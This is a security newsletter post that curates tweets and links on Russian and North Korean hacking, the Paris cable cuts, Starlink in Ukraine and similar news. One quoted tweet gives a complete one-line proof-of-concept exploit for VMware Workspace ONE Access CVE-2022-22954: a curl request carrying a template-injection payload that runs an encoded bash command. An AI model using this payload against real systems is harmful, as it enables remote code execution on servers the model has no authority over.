The Info Op

Share this post

The Info Op
The Info Op
April 28, 2022
Copy link
Facebook
Email
Notes
More

April 28, 2022

the grugq
Apr 28, 2022

Share this post

The Info Op
The Info Op
April 28, 2022
Copy link
Facebook
Email
Notes
More
Share

This story about cables cut in France is going to be interesting to follow.

Twitter avatar for @APB_Laudrain
Arthur P.B. Laudrain @APB_Laudrain
Major #internet cables physically cut at multiple places in Paris throughout the night. Some ISPs experiencing #outage over the country, increased latency for others. See for instance @netalisfr status.netalis.fr/issue/de7d81ed…
Image
9:51 AM ∙ Apr 27, 2022
243Likes183Retweets

Lots of attack in Ukraine, apparently.

Twitter avatar for @ddd1ms
𝕯𝖒𝖎𝖙𝖗𝖞 𝕾𝖒𝖎𝖑𝖞𝖆𝖓𝖊𝖙𝖘 @ddd1ms
According to the Computer Emergency Response Team of Ukraine, the country has recorded 802 cyberattacks since Russia invaded the country earlier this year. That compares to just 362 documented attacks during the same time last year, CERT-UA said.
therecord.mediaA deeper look at hacking groups and malware targeting UkraineUkraine’s main cybersecurity incident response team released a list on Friday of the five most persistent hacking groups attacking Ukraine’s critical infrastructure.
4:26 PM ∙ Apr 27, 2022
14Likes10Retweets

Oh boy…

Twitter avatar for @mtanji
mtanji @mtanji
I'm trying to think of how they could have done worse...nope, think they nailed it.
taskandpurpose.comThe Air Force is trusting the internet to name its ridiculous new cybersecurity mascotThe U.S. Air Force has decided to ask the internet to help it name its cybersecurity mascot. What could possibly go wrong?
3:53 PM ∙ Apr 27, 2022
9Likes4Retweets

Mandiant report linking the SolarWinds hack to APT29.

https://www.mandiant.com/resources/unc2452-merged-into-apt29

The Info Op is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.

Lots of Russian cyber activity linked to Ukraine, but more specifically linked to military actions. Here’s the report:

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd

Learn you some mobile phone security.

Twitter avatar for @LaF0rge
LaForge @LaF0rge
If you ever want to manually go through the steps that happen when a SIM card is authenticated by 3G/4G/5G networks, see osmocom.org/projects/pysim… for a walkthrough using osmo-auc-gen and pySim. #gsm #cellular #osmocom
osmocom.orgManually Testing USIM Authentication - pySim - Open Source Mobile CommunicationsRedmine
5:34 PM ∙ Apr 27, 2022
58Likes21Retweets

POC exploit for VMWare something. It fits in a tweet. Those are always cool.

Twitter avatar for @wvuuuuuuuuuuuuu
wvu @wvuuuuuuuuuuuuu
Exploit for VMware Workspace ONE Access CVE-2022-22954: curl -kv https://192.168.0.240/catalog-portal/ui/oauth/verify -H "Host: lol" -Gd error= --data-urlencode 'deviceUdid=${"freemarker.template.utility.Execute"?new()("bash -c {eval,$({echo,aWQ7dW5hbWUgLWE=}|{base64,-d})}")}'
12:41 AM ∙ Apr 28, 2022
359Likes115Retweets

Couple of things here. Firstly, great thread. Secondly, the concept of stupid proofing equipment and tools to ensure that bad users can’t do the wrong thing… that’s powerful. It’s partially what mobile phones do to security. So many attack vectors don’t exist because they’re impossible within the constraints of the device.

Twitter avatar for @TrentTelenko
Trent Telenko @TrentTelenko
Missile container thread 🧵note the wooden boxes used to move Russian Kornet large vehicle anti-tank missiles. You can learn a lot about real history versus 'narratives' by paying attention to them. This thread will demonstrate why that is. 1/
Twitter avatar for @Osinttechnical
OSINTtechnical @Osinttechnical
Kherson Oblast, abandoned Russian BTR-D, note the Kornet ATGM ammunition https://t.co/sIbwrUvIfN
7:43 PM ∙ Apr 27, 2022
2,634Likes528Retweets

Report that he mentions is here

https://apps.dtic.mil/sti/citations/ADA259704

News these days can be a little bit too psychedelic sometimes

Twitter avatar for @CovertShores
H I Sutton @CovertShores
***BREAKING*** Evidence #Russian Navy trained dolphins deployed to entrance of Sevastopol Harbor during #Ukraine war. You heard it here first. First found in low-resolution Sentinel 2 imagery Thx for help from @COUPSURE and unnamed others
news.usni.orgTrained Russian Navy Dolphins are Protecting Black Sea Naval Base, Satellite Photos Show - USNI NewsRussia has deployed trained dolphins during its invasion of Ukraine to protect a Black Sea naval base, USNI News has learned. The Russian Navy has placed two dolphin pens at the entrance to Sevastopol harbor, sheltered just inside a sea wall. The pens were moved there in February, around the time of…
8:12 PM ∙ Apr 27, 2022
2,848Likes1,116Retweets

-

There’s a cyber war on. No, the other one.

Twitter avatar for @InsideStairwell
Stairwell @InsideStairwell
@silascutler, Stairwell principal reverse engineer, shares intel about #GOLDBACKDOOR, #APT37, and the Democratic People's Republic of Korea's history of cyber operations as a key means of supporting the regime.
bit.lyNorth Korean Hackers Target Journalists with GOLDBACKDOOR MalwareResearchers have uncovered a new campaign by a North Korean-backed hacking group targeting journalists covering the country.
10:42 PM ∙ Apr 26, 2022
5Likes2Retweets

-

More Turla.

Twitter avatar for @juanandres_gs
J. A. Guerrero-Saade @juanandres_gs
This didn't get nearly enough of attention so I'm bumping @hatr's amazing reporting on the Turla -> Ryazan connection. Our best to Vlad, Urik, and Gilg!
interaktiv.br.deThe Elite Hackers of the FSBFor almost two decades, hackers with Snake have been forcing their way into government networks. Who they work for, though, has always been a matter of pure speculation. But reporters with the German public broadcasters BR and WDR have discovered some clues, and they lead to Russia.
12:32 AM ∙ Apr 28, 2022
29Likes13Retweets

-

A mention of the value of the satellite comms takedown which keeps being dismissed by many cyberwar analysts.

Twitter avatar for @dpatrikarakos
David Patrikarakos @dpatrikarakos
"I want to say one thing: @elonmusk's Starlink is what changed the war in #Ukraine's favour. #Russia went out of its way to blow up all our comms. Now they can't. Starlink works under Katyusha fire, under artillery fire. It even works in Mariupol."
Image
1:12 PM ∙ Apr 27, 2022
12,262Likes2,687Retweets

-

Here’s the videos from Enigma 2022

Twitter avatar for @enigmaconf
Enigma Conference @enigmaconf
The videos from Enigma 2022 are now posted on the conference program page, and are freely available to watch thanks to USENIX's open access policy: bit.ly/enigma2022prog #enigma2022
bit.lyEnigma 2022 Conference ProgramEnigma 2022 will take place February 1–3, 2022, at the Hyatt Regency Santa Clara in Santa Clara, CA, USA. Enigma centers on a single track of engaging talks covering a wide range of topics in security and privacy. Our goal is to clearly explain emerging threats and defenses in the growing intersecti…
7:34 PM ∙ Apr 27, 2022
17Likes11Retweets

Awesome, if true.

https://www.wired.com/story/north-korean-phone-jailbreakers/

A valid point.

Twitter avatar for @secparam
Ian Miers @secparam
So @Snowden participated in the original Zcash set up ceremony. How did he go about getting/storing secure hardware? Peter Todd had his ninja alarm (a chair against the door), to guard against whimsical spies. But Snowden was, at least plausibly, under actual FSB surveillance.
4:24 AM ∙ Apr 28, 2022
25Likes6Retweets

For what it’s worth, this exists. Not the sort of thing that floats my boat, but I’d remiss to ignore it.

https://www.whitehouse.gov/briefing-room/statements-releases/2022/04/28/fact-sheet-united-states-and-60-global-partners-launch-declaration-for-the-future-of-the-internet/

Thank you for reading The Info Op. This post is public so feel free to share it.

Share

Share this post

The Info Op
The Info Op
April 28, 2022
Copy link
Facebook
Email
Notes
More
Share

Discussion about this post

No posts

Ready for more?

© 2025 the grugq
Privacy ∙ Terms ∙ Collection notice
Start WritingGet the app
Substack is the home for great culture

Share

Copy link
Facebook
Email
Notes
More